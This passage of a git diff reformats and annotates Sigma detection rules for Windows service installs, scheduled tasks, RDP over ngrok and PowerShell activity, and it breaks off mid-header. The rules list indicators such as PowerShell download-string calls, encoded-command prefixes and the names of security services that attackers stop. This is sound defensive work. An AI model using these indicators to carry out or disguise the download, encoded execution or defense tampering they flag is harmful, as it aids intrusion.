b/sigma/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml index 8f050e89f..be3714f05 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml @@ -1,11 +1,10 @@ title: Service Installed By Unusual Client - System id: 71c276aa-49cd-43d2-b920-2dcd3e6962d5 related: - - id: c4e92a97-a9ff-4392-9d2d-7a4c642768ca - type: similar + - id: c4e92a97-a9ff-4392-9d2d-7a4c642768ca + type: similar status: test -description: Detects a service installed by a client which has PID 0 or whose parent - has PID 0 +description: Detects a service installed by a client which has PID 0 or whose parent has PID 0 references: - https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html author: Tim Rauch (Nextron Systems), Elastic diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_susp.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_susp.yml index b458d9437..a43404c9b 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_susp.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_susp.yml @@ -1,10 +1,10 @@ title: Suspicious Service Installation id: 1d61f71d-59d2-479e-9562-4ff5f4ead16b related: - - id: ca83e9f3-657a-45d0-88d6-c1ac280caf53 - type: obsoletes - - id: 26481afe-db26-4228-b264-25a29fe6efc7 - type: similar + - id: ca83e9f3-657a-45d0-88d6-c1ac280caf53 + type: obsoletes + - id: 26481afe-db26-4228-b264-25a29fe6efc7 + type: similar status: test description: Detects suspicious service installation commands author: pH-T (Nextron Systems), Florian Roth (Nextron Systems) @@ -29,8 +29,8 @@ detection: - ' -sta ' - ' -w hidden ' - :\Temp\ - - .downloadfile( - - .downloadstring( + - .downloadfile( # PowerShell download command + - .downloadstring( # PowerShell download command - \ADMIN$\ - \Perflogs\ - '&&' diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml index 6d5a36a8f..cf1379d08 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml @@ -22,8 +22,8 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ServiceName: PSEXESVC - - ImagePath|endswith: \PSEXESVC.exe + - ServiceName: PSEXESVC + - ImagePath|endswith: \PSEXESVC.exe condition: system and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml index 1349f0122..fe8c25dc4 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml @@ -1,8 +1,7 @@ title: TacticalRMM Service Installation id: 4bb79b62-ef12-4861-981d-2aab43fab642 status: test -description: Detects a TacticalRMM service installation. Tactical RMM is a remote - monitoring & management tool. +description: Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool. references: - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,8 +19,8 @@ detection: Provider_Name: Service Control Manager EventID: 7045 selection_service: - - ImagePath|contains: tacticalrmm.exe - - ServiceName|contains: TacticalRMM Agent Service + - ImagePath|contains: tacticalrmm.exe + - ServiceName|contains: TacticalRMM Agent Service condition: system and (all of selection_*) falsepositives: - Legitimate use of the tool diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml index b3f075a3c..2b5e359a8 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml @@ -1,8 +1,7 @@ title: Tap Driver Installation id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 status: test -description: Well-known TAP software installation. Possible preparation for data exfiltration - using tunnelling techniques +description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques author: Daniil Yugoslavskiy, Ian Davis, oscd.community date: 2019/10/24 modified: 2022/12/25 diff --git a/sigma/builtin/system/service_control_manager/win_system_service_install_uncommon.yml b/sigma/builtin/system/service_control_manager/win_system_service_install_uncommon.yml index 193291319..5a8c03cca 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_install_uncommon.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_install_uncommon.yml @@ -1,10 +1,10 @@ title: Uncommon Service Installation id: 26481afe-db26-4228-b264-25a29fe6efc7 related: - - id: ca83e9f3-657a-45d0-88d6-c1ac280caf53 - type: obsoletes - - id: 1d61f71d-59d2-479e-9562-4ff5f4ead16b - type: derived + - id: ca83e9f3-657a-45d0-88d6-c1ac280caf53 + type: obsoletes + - id: 1d61f71d-59d2-479e-9562-4ff5f4ead16b + type: derived status: test description: Detects uncommon service installation commands author: Florian Roth (Nextron Systems) @@ -33,19 +33,18 @@ detection: ImagePath|contains: ' -e' suspicious_encoded_keywords: ImagePath|contains: - - ' aQBlAHgA' - - ' aWV4I' - - ' IAB' - - ' JAB' - - ' PAA' - - ' SQBFAFgA' - - ' SUVYI' + - ' aQBlAHgA' # PowerShell encoded commands + - ' aWV4I' # PowerShell encoded commands + - ' IAB' # PowerShell encoded commands + - ' JAB' # PowerShell encoded commands + - ' PAA' # PowerShell encoded commands + - ' SQBFAFgA' # PowerShell encoded commands + - ' SUVYI' # PowerShell encoded commands filter_optional_thor_remote: ImagePath|startswith: :\WINDOWS\TEMP\thor10-remote\thor64.exe filter_main_defender_def_updates: ImagePath|contains: :\ProgramData\Microsoft\Windows Defender\Definition Updates\ - condition: system and (selection and ( suspicious_paths or all of suspicious_encoded_* - ) and not 1 of filter_main_* and not 1 of filter_optional_*) + condition: system and (selection and ( suspicious_paths or all of suspicious_encoded_* ) and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml b/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml index adb385122..741f81281 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml @@ -1,8 +1,8 @@ title: Windows Service Terminated With Error id: acfa2210-0d71-4eeb-b477-afab494d596c related: - - id: d6b5520d-3934-48b4-928c-2aa3f92d6963 - type: similar + - id: d6b5520d-3934-48b4-928c-2aa3f92d6963 + type: similar status: experimental description: Detects Windows services that got terminated for whatever reason references: @@ -19,10 +19,9 @@ detection: Channel: System selection: Provider_Name: Service Control Manager - EventID: 7023 + EventID: 7023 # The X Service service terminated with the following error condition: system and selection falsepositives: - - False positives could occur since service termination could happen due to multiple - reasons + - False positives could occur since service termination could happen due to multiple reasons level: low ruletype: Sigma diff --git a/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml b/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml index 4738bf25b..6f600824f 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml @@ -1,11 +1,10 @@ title: Important Windows Service Terminated With Error id: d6b5520d-3934-48b4-928c-2aa3f92d6963 related: - - id: acfa2210-0d71-4eeb-b477-afab494d596c - type: similar + - id: acfa2210-0d71-4eeb-b477-afab494d596c + type: similar status: experimental -description: Detects important or interesting Windows services that got terminated - for whatever reason +description: Detects important or interesting Windows services that got terminated for whatever reason references: - https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,27 +19,28 @@ detection: Channel: System selection_eid: Provider_Name: Service Control Manager - EventID: 7023 + EventID: 7023 # The X Service service terminated with the following error selection_name: - - param1|contains: - - ' Antivirus' - - ' Firewall' - - Application Guard - - BitLocker Drive Encryption Service - - Encrypting File System - - Microsoft Defender - - Threat Protection - - Windows Event Log - - Binary|contains: - - 770069006e0064006500660065006e006400 - - 4500760065006e0074004c006f006700 - - 6d0070007300730076006300 - - 530065006e0073006500 - - '450046005300' - - '420044004500530056004300' + - param1|contains: + # Note that these names are "Display Names" and are language specific. If you're using a non-english system these can and will be different + - ' Antivirus' + - ' Firewall' + - Application Guard + - BitLocker Drive Encryption Service + - Encrypting File System + - Microsoft Defender + - Threat Protection + - Windows Event Log + # Use this If you collect the binary value provided from this event, which is the wide hex encoded value of the service name. + - Binary|contains: + - 770069006e0064006500660065006e006400 # windefend (Microsoft Defender Antivirus Service) + - 4500760065006e0074004c006f006700 # EventLog + - 6d0070007300730076006300 # mpssvc (Windows Defender Firewall) + - '530065006e0073006500' # Sense (Windows Defender Advanced Threat Protection Service) + - '450046005300' # EFS (Encrypting File System) + - '420044004500530056004300' # BDESVC (BitLocker Drive Encryption Service) condition: system and (all of selection_*) falsepositives: - - Rare false positives could occur since service termination could happen due - to multiple reasons + - Rare false positives could occur since service termination could happen due to multiple reasons level: high ruletype: Sigma diff --git a/sigma/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml b/sigma/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml index 3eed3a669..1c3287cee 100644 --- a/sigma/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml +++ b/sigma/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml @@ -1,8 +1,7 @@ title: Important Windows Service Terminated Unexpectedly id: 56abae0c-6212-4b97-adc0-0b559bb950c3 status: experimental -description: Detects important or interesting Windows services that got terminated - unexpectedly. +description: Detects important or interesting Windows services that got terminated unexpectedly. references: - https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/ author: Nasreddine Bencherchali (Nextron Systems) @@ -17,15 +16,16 @@ detection: Channel: System selection_eid: Provider_Name: Service Control Manager - EventID: 7034 + EventID: 7034 # The X service terminated unexpectedly. It has done this Y time(s). selection_name: - - param1|contains: Message Queuing - - Binary|contains: - - 4d0053004d005100 - - 6d0073006d007100 + # Note that these names contained in "param1" are "Display Names" and are language specific. If you're using a non-english system these can and will be different + - param1|contains: Message Queuing + # Use this If you collect the binary value provided from this event, which is the wide hex encoded value of the service name. + - Binary|contains: + - 4d0053004d005100 # MSMQ (Microsoft Message Queuing). Encoded in upper case just in case + - 6d0073006d007100 # msmq condition: system and (all of selection_*) falsepositives: - - Rare false positives could occur since service termination could happen due - to multiple reasons + - Rare false positives could occur since service termination could happen due to multiple reasons level: high ruletype: Sigma diff --git a/sigma/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml b/sigma/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml index 771bd85ee..3acf6213f 100644 --- a/sigma/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml +++ b/sigma/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml @@ -1,8 +1,7 @@ title: RTCore Suspicious Service Installation id: 91c49341-e2ef-40c0-ac45-49ec5c3fe26c status: test -description: Detects the installation of RTCore service. Which could be an indication - of Micro-Star MSI Afterburner vulnerable driver abuse +description: Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse references: - https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml b/sigma/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml index f50da7c65..b9b253e46 100644 --- a/sigma/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml +++ b/sigma/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml @@ -20,8 +20,8 @@ detection: Provider_Name: Service Control Manager EventID: 7045 suspicious1: - - ImagePath|re: ^[Cc]:\\[Pp]rogram[Dd]ata\\.{1,9}\.exe - - ImagePath|re: ^[Cc]:\\.{1,9}\.exe + - ImagePath|re: ^[Cc]:\\[Pp]rogram[Dd]ata\\.{1,9}\.exe + - ImagePath|re: ^[Cc]:\\.{1,9}\.exe condition: system and (selection and 1 of suspicious*) falsepositives: - Unknown diff --git a/sigma/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml b/sigma/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml index 716231f2b..41b09cf33 100644 --- a/sigma/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml +++ b/sigma/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml @@ -26,5 +26,6 @@ detection: condition: system and selection falsepositives: - Bad connections or network interruptions +# too many false positives level: medium ruletype: Sigma diff --git a/sigma/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml b/sigma/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml index 9a6f37493..7ac495f42 100644 --- a/sigma/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml +++ b/sigma/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml @@ -1,9 +1,7 @@ title: Scheduled Task Executed From A Suspicious Location id: 424273ea-7cf8-43a6-b712-375f925e481f status: test -description: Detects the execution of Scheduled Tasks where the Program being run - is located in a suspicious location or it's an unusale program to be run from - a Scheduled Task +description: Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -15,14 +13,12 @@ tags: logsource: product: windows service: taskscheduler - definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is - disabled by default and needs to be enabled in order for this detection to - trigger' + definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger' detection: taskscheduler: Channel: Microsoft-Windows-TaskScheduler/Operational selection: - EventID: 129 + EventID: 129 # Created Task Process Path|contains: - C:\Windows\Temp\ - \AppData\Local\Temp\ @@ -30,6 +26,10 @@ detection: - \Downloads\ - \Users\Public\ - C:\Temp\ + # If you experience FP. Uncomment the filter below and add the specific TaskName with the Program to it + # filter: + # TaskName: '\Exact\Task\Name' + # Path: 'Exact\Path' condition: taskscheduler and selection falsepositives: - Unknown diff --git a/sigma/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml b/sigma/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml index 45501e8b3..e4f8f4fe5 100644 --- a/sigma/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml +++ b/sigma/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml @@ -1,9 +1,7 @@ title: Scheduled Task Executed Uncommon LOLBIN id: f0767f15-0fb3-44b9-851e-e8d9a6d0005d status: test -description: Detects the execution of Scheduled Tasks where the program being run - is located in a suspicious location or where it is an unusual program to be run - from a Scheduled Task +description: Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -15,14 +13,12 @@ tags: logsource: product: windows service: taskscheduler - definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is - disabled by default and needs to be enabled in order for this detection to - trigger' + definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger' detection: taskscheduler: Channel: Microsoft-Windows-TaskScheduler/Operational selection: - EventID: 129 + EventID: 129 # Created Task Process Path|endswith: - \calc.exe - \cscript.exe @@ -30,11 +26,14 @@ detection: - \mspaint.exe - \notepad.exe - \regsvr32.exe + # - '\rundll32.exe' - \wscript.exe + # filter_system: + # Path|endswith: '\rundll32.exe' + # TaskName|startswith: '\Microsoft\Windows\' + # condition: selection and not 1 of filter_* condition: taskscheduler and selection falsepositives: - - False positives may occur with some of the selected binaries if you have tasks - using them (which could be very common in your environment). Exclude all the - specific trusted tasks before using this rule + - False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule level: medium ruletype: Sigma diff --git a/sigma/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml b/sigma/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml index bbbf7b10f..900110595 100644 --- a/sigma/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml +++ b/sigma/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml @@ -1,14 +1,12 @@ title: Important Scheduled Task Deleted id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d related: - - id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 - type: similar - - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad - type: similar + - id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 # ProcCreation schtasks delete + type: similar + - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog + type: similar status: test -description: Detects when adversaries try to stop system services or processes by - deleting their respective scheduled tasks in order to conduct data destructive - activities +description: Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities author: frack113 date: 2023/01/13 modified: 2023/02/07 @@ -18,9 +16,7 @@ tags: logsource: product: windows service: taskscheduler - definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is - disabled by default and needs to be enabled in order for this detection to - trigger' + definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger' detection: taskscheduler: Channel: Microsoft-Windows-TaskScheduler/Operational diff --git a/sigma/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml b/sigma/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml index d0af9b7b8..70deffb5f 100644 --- a/sigma/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml +++ b/sigma/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml @@ -1,8 +1,7 @@ title: Ngrok Usage with Remote Desktop Service id: 64d51a51-32a6-49f0-9f3d-17e34d640272 status: test -description: Detects cases in which ngrok, a reverse proxy tool, forwards events to - the local RDP port, which could be a sign of malicious behaviour +description: Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour references: - https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg - https://ngrok.com/ diff --git a/sigma/builtin/threat-hunting/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml b/sigma/builtin/threat-hunting/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml index a8c6f0638..af3be30f2 100644 --- a/sigma/builtin/threat-hunting/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml +++ b/sigma/builtin/threat-hunting/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml @@ -1,11 +1,10 @@ title: Uncommon PowerShell Hosts id: d7326048-328b-4d5e-98af-86e84b17c765 related: - - id: 64e8e417-c19a-475a-8d19-98ea705394cc - type: derived + - id: 64e8e417-c19a-475a-8d19-98ea705394cc + type: derived status: test -description: Detects alternate PowerShell hosts potentially bypassing detections looking - for powershell.exe +description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe references: - https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html author: Roberto Rodriguez @Cyb3rWard0g @@ -24,10 +23,11 @@ detection: Channel: Windows PowerShell selection: Data|contains: HostApplication= + # Note: Powershell Logging Data is localized. Meaning that "HostApplication" field will be translated to a different field on a non english layout. This rule doesn't take this into account due to the sheer ammount of possibilities. It's up to the user to add these cases. filter_main_ps: Data|contains: - - HostApplication=?:/Windows/System32/WindowsPowerShell/v1.0/powershell - - HostApplication=?:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell + - HostApplication=?:/Windows/System32/WindowsPowerShell/v1.0/powershell # In some cases powershell was invoked with inverted slashes + - HostApplication=?:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell # In some cases powershell was invoked with inverted slashes - HostApplication=?:\Windows\System32\sdiagnhost.exe - HostApplication=?:\Windows\System32\WindowsPowerShell\v1.0\powershell - HostApplication=?:\Windows\SysWOW64\sdiagnhost.exe @@ -35,8 +35,7 @@ detection: - HostApplication=powershell filter_optional_citrix: Data|contains: Citrix\ConfigSync\ConfigSync.ps1 - condition: ps_classic_start and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: ps_classic_start and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter - MSP Detection Searcher diff --git a/sigma/builtin/threat-hunting/powershell/powershell_module/posh_pm_susp_netfirewallrule_recon.yml b/sigma/builtin/threat-hunting/powershell/powershell_module/posh_pm_susp_netfirewallrule_recon.yml index d067e7aa9..ccf8a13e1 100644 --- a/sigma/builtin/threat-hunting/powershell/powershell_module/posh_pm_susp_netfirewallrule_recon.yml +++ b/sigma/builtin/threat-hunting/powershell/powershell_module/posh_pm_susp_netfirewallrule_recon.yml @@ -1,8 +1,7 @@ title: Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet id: ea207a23-b441-4a17-9f76-ad5be47d51d3 status: experimental -description: Detects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" - to enumerate the local firewall rules on a host. +description: Detects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" to enumerate the local firewall rules on a host. references: - https://learn.microsoft.com/en-us/powershell/module/netsecurity/get-netfirewallrule?view=windowsserver2022-ps - https://learn.microsoft.com/en-us/powershell/module/netsecurity/show-netfirewallrule?view=windowsserver2022-ps diff --git a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_compress_archive_usage.yml b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_compress_archive_usage.yml index 5233fd5da..f449ca832 100644 --- a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_compress_archive_usage.yml +++ b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_compress_archive_usage.yml @@ -1,14 +1,9 @@ title: Compress-Archive Cmdlet Execution id: 6dc5d284-69ea-42cf-9311-fb1c3932a69a status: test -description: 'Detects PowerShell scripts that make use of the "Compress-Archive" cmdlet - in order to compress folders and files. - - An adversary might compress data (e.g., sensitive documents) that is collected - prior to exfiltration in order to make it portable and minimize the amount of - data sent over the network. - - ' +description: | + Detects PowerShell scripts that make use of the "Compress-Archive" cmdlet in order to compress folders and files. + An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md author: Timur Zinniatullin, oscd.community diff --git a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_mailbox_access.yml b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_mailbox_access.yml index 9442f6e80..bfa6df08e 100644 --- a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_mailbox_access.yml +++ b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_mailbox_access.yml @@ -1,10 +1,7 @@ title: Windows Mail App Mailbox Access Via PowerShell Script id: 4e485d01-e18a-43f6-a46b-ef20496fa9d3 status: experimental -description: Detects PowerShell scripts that try to access the default Windows MailApp - MailBox. This indicates manipulation of or access to the stored emails of a user. - E.g. this could be used by an attacker to exfiltrate or delete the content of - the emails. +description: Detects PowerShell scripts that try to access the default Windows MailApp MailBox. This indicates manipulation of or access to the stored emails of a user. E.g. this could be used by an attacker to exfiltrate or delete the content of the emails. references: - https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1070.008/T1070.008.md author: frack113 diff --git a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_new_smbmapping_quic.yml b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_new_smbmapping_quic.yml index dbe699479..45ca8aacb 100644 --- a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_new_smbmapping_quic.yml +++ b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_new_smbmapping_quic.yml @@ -1,11 +1,10 @@ title: SMB over QUIC Via PowerShell Script id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae related: - - id: 2238d337-42fb-4971-9a68-63570f2aede4 - type: similar + - id: 2238d337-42fb-4971-9a68-63570f2aede4 + type: similar status: experimental -description: Detects the mounting of Windows SMB shares over QUIC, which can be an - unexpected event in some enterprise environments +description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments references: - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md - https://learn.microsoft.com/en-us/powershell/module/smbshare/new-smbmapping?view=windowsserver2022-ps @@ -32,8 +31,6 @@ detection: - -TransportType QUIC condition: ps_script and selection falsepositives: - - Due to the nature of the script block, the matching of the string could sometimes - result in a false positive. Use this rule to hunt for potential malicious - or suspicious scripts. + - Due to the nature of the script block, the matching of the string could sometimes result in a false positive. Use this rule to hunt for potential malicious or suspicious scripts. level: medium ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_registry_reconnaissance.yml b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_registry_reconnaissance.yml index 733eb328b..af8e3f73f 100644 --- a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_registry_reconnaissance.yml +++ b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_registry_reconnaissance.yml @@ -1,12 +1,10 @@ title: Potential Registry Reconnaissance Via PowerShell Script id: 064060aa-09fb-4636-817f-020a32aa7e9e related: - - id: 970007b7-ce32-49d0-a4a4-fbef016950bd - type: similar + - id: 970007b7-ce32-49d0-a4a4-fbef016950bd + type: similar status: experimental -description: Detects PowerShell scripts with potential registry reconnaissance capabilities. - Adversaries may interact with the Windows registry to gather information about - the system credentials, configuration, and installed software. +description: Detects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md author: frack113 @@ -27,11 +25,10 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection: + # TODO: switch to |re|i: after sigma specification v2 is released ScriptBlockText|re: (Get-Item|gci|Get-ChildItem).{1,64}-Path.{1,64}\\(currentcontrolset\\services|CurrentVersion\\Policies\\Explorer\\Run|CurrentVersion\\Run|CurrentVersion\\ShellServiceObjectDelayLoad|CurrentVersion\\Windows\winlogon)\\ condition: ps_script and selection falsepositives: - - Due to the nature of the script block, the matching of the string could sometimes - result in a false positive. Use this rule to hunt for potential malicious - or suspicious scripts. + - Due to the nature of the script block, the matching of the string could sometimes result in a false positive. Use this rule to hunt for potential malicious or suspicious scripts. level: medium ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_remove_item_path.yml b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_remove_item_path.yml index 82362d40c..3036a73d5 100644 --- a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_remove_item_path.yml +++ b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_remove_item_path.yml @@ -1,8 +1,7 @@ title: Use Of Remove-Item to Delete File - ScriptBlock id: b8af5f36-1361-4ebe-9e76-e36128d947bf status: test -description: PowerShell Remove-Item with -Path to delete a file or a folder with - "-Recurse" +description: PowerShell Remove-Item with -Path to delete a file or a folder with "-Recurse" references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7 diff --git a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_functions_access.yml b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_functions_access.yml index aed71c92c..282d23537 100644 --- a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_functions_access.yml +++ b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_functions_access.yml @@ -1,16 +1,14 @@ title: WinAPI Library Calls Via PowerShell Scripts id: 19d65a1c-8540-4140-8062-8eb00db0bba5 related: - - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702 - type: similar - - id: 03d83090-8cba-44a0-b02f-0b756a050306 - type: similar - - id: 9f22ccd5-a435-453b-af96-bf99cbb594d4 - type: similar + - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702 + type: similar + - id: 03d83090-8cba-44a0-b02f-0b756a050306 + type: similar + - id: 9f22ccd5-a435-453b-af96-bf99cbb594d4 + type: similar status: experimental -description: Detects calls to WinAPI libraries from PowerShell scripts. Attackers - can often leverage these APIs to avoid detection based on typical PowerShell function - calls. Use this rule as a basis to hunt for interesting scripts. +description: Detects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts. references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse author: Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems) diff --git 